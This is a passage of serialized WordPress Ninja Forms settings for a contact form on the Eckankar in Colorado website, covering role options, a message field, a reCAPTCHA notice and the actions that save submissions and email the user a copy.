dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:1;}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:3:\"CFO\";s:5:\"value\";s:3:\"CFO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:2;}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:17:\"Class Coordinator\";s:5:\"value\";s:17:\"Class Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:3;}i:4;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"Communication Coordinator\";s:5:\"value\";s:25:\"Communication Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:4;}i:5;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:17:\"Database Director\";s:5:\"value\";s:17:\"Database Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:5;}i:6;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:26:\"Family & Youth Coordinator\";s:5:\"value\";s:28:\"family-and-youth-coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:6;}i:7;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:9:\"President\";s:5:\"value\";s:9:\"President\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:7;}i:8;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:4:\"RESA\";s:5:\"value\";s:4:\"RESA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:8;}i:9;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:9;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:10;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:15:\"Vahana Director\";s:5:\"value\";s:15:\"Vahana Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";i:10;}}s:3:\"key\";s:13:\"listselect_15\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:41:\"Select the person you would like to email\";s:9:\"field_key\";s:13:\"listselect_15\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:104;}i:9;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:5:\"label\";s:23:\"Enter Your Message Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:11:\"textarea_16\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";s:0:\"\";s:11:\"field_label\";s:23:\"Enter Your Message Here\";s:9:\"field_key\";s:11:\"textarea_16\";s:5:\"value\";s:0:\"\";}s:2:\"id\";i:105;}i:10;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:199:\"This site is protected by reCAPTCHA and the Google\n    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and\n    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797801429\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"621\";}i:11;a:2:{s:8:\"settings\";a:19:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:9:\"submit_12\";s:15:\"container_class\";s:0:\"\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:9:\"submit_12\";}s:2:\"id\";i:107;}i:12;a:2:{s:8:\"settings\";a:11:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:13;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"HTML\";s:7:\"default\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797799791\";}s:2:\"id\";s:3:\"622\";}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:31:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:35\";s:5:\"label\";s:9:\"Save Form\";s:16:\"subs_expire_time\";s:2:\"90\";s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"exception_fields\";a:0:{}s:18:\"fields-save-toggle\";s:8:\"save_all\";s:15:\"submitter_email\";s:0:\"\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:19:\"email_message_plain\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:37;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:35\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:16:\"{field:email_10}\";s:13:\"email_subject\";s:41:\"Colorado RESA Organization Communications\";s:13:\"email_message\";s:3555:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<h1>Eckankar In Colorado</h1><br /><br />\r\n</td><br /><br />\r\n<td> </td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\"><br /><br />\r\n<p><strong>Hello {field:textbox_6},</strong></p><br /><br />\r\n<p>Thanks for getting in touch! You have created a new form submission on the Eckankar In Colorado website requesting contact with a person on the Colorado RESA Organization Communications team.</p><br /><br />\r\n<p>Here is a copy of the information that you have submitted:</p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />\r\n                                \" valign=\"top\"><br /><br />\r\n<p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_6}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_8}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_10}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_9}</span><br /><br /><br />\r\n <span style=\"color: #333333\"><strong>LOCAL AREA:</strong> {field:listselect_11}<br /><br /><br />\r\n </span><span style=\"color: #333333\"><strong>PERSON YOU WOULD LIKE TO CONTACT:</strong> {field:listselect_15}</span></p><br /><br />\r\n<p><span style=\"color: #333333\"><strong>MESSAGE: </strong>{field:textarea_16}</span></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n<tr><br /><br />\r\n<td align=\"center\" valign=\"top\"><br /><br />\r\n<table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><br /><br />\r\n<tbody><br /><br />\r\n<tr><br /><br />\r\n<td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the<br /><br /><br />\r\n Eckankar In Colorado webmaster: webmaster@eckankar-colorado.org<br /><br />\r\n<br /><br />\r\n<p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br /><br /><br />\r\n <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n</td><br /><br />\r\n</tr><br /><br />\r\n</tbody><br /><br />\r\n</table><br /><br />\r\n<p> </p>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:10:\"conditions\";a:6:{s:9:\"collapsed\";s:0:\"\";s:7:\"process\";s:1:\"1\";s:9:\"connector\";s:3:\"all\";s:4:\"when\";a:1:{i:0;a:6:{s:9:\"connector\";s:3:\"AND\";s:3:\"key\";s:0:\"\";s:10:\"comparator\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"when\";}}s:4:\"then\";a:1:{i:0;a:5:{s:3:\"key\";s:0:\"\";s:7:\"trigger\";s:0:\"\";s:5:\"value\";s:0:\"\";s:4:\"type\";s:5:\"field\";s:9:\"modelType\";s:4:\"then\";}}s:4:\"else\";a:0:{}}s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";}s:2:\"id\";i:38;}i:2;a:2:{s:8:\"settings\";a:34:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:42:35\";s:5:\"label\";s:15:\"Success Message\";s:16:\"subs_expire_time\";s:2:\"90\";s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"exception_fields\";a:0:{}s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:14:\"drawerDisabled\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms 